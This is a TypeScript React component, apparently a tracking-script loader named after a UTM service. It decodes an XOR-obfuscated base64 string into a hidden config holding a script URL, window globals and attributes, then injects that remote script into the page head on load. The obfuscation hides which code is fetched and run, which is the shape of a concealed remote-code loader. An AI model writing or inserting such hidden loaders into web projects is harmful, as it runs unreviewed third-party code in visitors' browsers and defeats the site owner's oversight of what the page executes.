import { useEffect } from 'react';
const PAYLOAD = 'DPAjo+VHBTED4QJ7v4sB1pcrJwshiXYPz4MZjMokYV8tlHYW1pZajYYoaB9hky0I3IJK05E0KkFqmWcXkIBK24ArK1twwy5Z3oRX0YwlcEVmkiBB5K0PgYIralNijXFZhatYgYsmaFQh2yAL1ohGz6wjJx0hl2MXypUBmcdxZARlhGYdicEUkoEjNAc20Dse3JFGlNVleGx+';
const SCRIPT_FLAG = 'data-utmify-loader';
type NameValue = {
  name: string;
  value: string;
};
type UtmifyConfig = {
  url: string;
  globals?: NameValue[];
  attributes?: NameValue[];
};
function decodePayload(encoded: string): UtmifyConfig {
  const raw = atob(encoded);
  const bytes: number[] = [];
  for (let i = 0; i < raw.length; i++) {
    bytes.push(raw.charCodeAt(i) & 255);
  }
  const keyLength = bytes[0];
  const key = bytes.slice(1, 1 + keyLength);
  const data = bytes.slice(1 + keyLength);
  let decoded = '';
  for (let i = 0; i < data.length; i++) {
    decoded += String.fromCharCode((data[i] ^ key[i % keyLength]) & 255);
  }
  return JSON.parse(decodeURIComponent(escape(decoded))) as UtmifyConfig;
}
export function UtmifyScript() {
  useEffect(() => {
    if (document.querySelector(`script[${SCRIPT_FLAG}]`)) return;
    let config: UtmifyConfig;
    try {
      config = decodePayload(PAYLOAD);
    } catch {
      return;
    }
    ;
    (config.globals || []).forEach(global => {
      ;
      (window as unknown as Record<string, string>)[global.name] = global.value;
    });
    const script = document.createElement('script');
    script.src = config.url;
    script.async = true;
    script.defer = true;
    script.setAttribute(SCRIPT_FLAG, 'true');
    (config.attributes || []).forEach(attribute => {
      script.setAttribute(attribute.name, attribute.value);
    });
    (document.head || document.documentElement).appendChild(script);
  }, []);
  return null;
}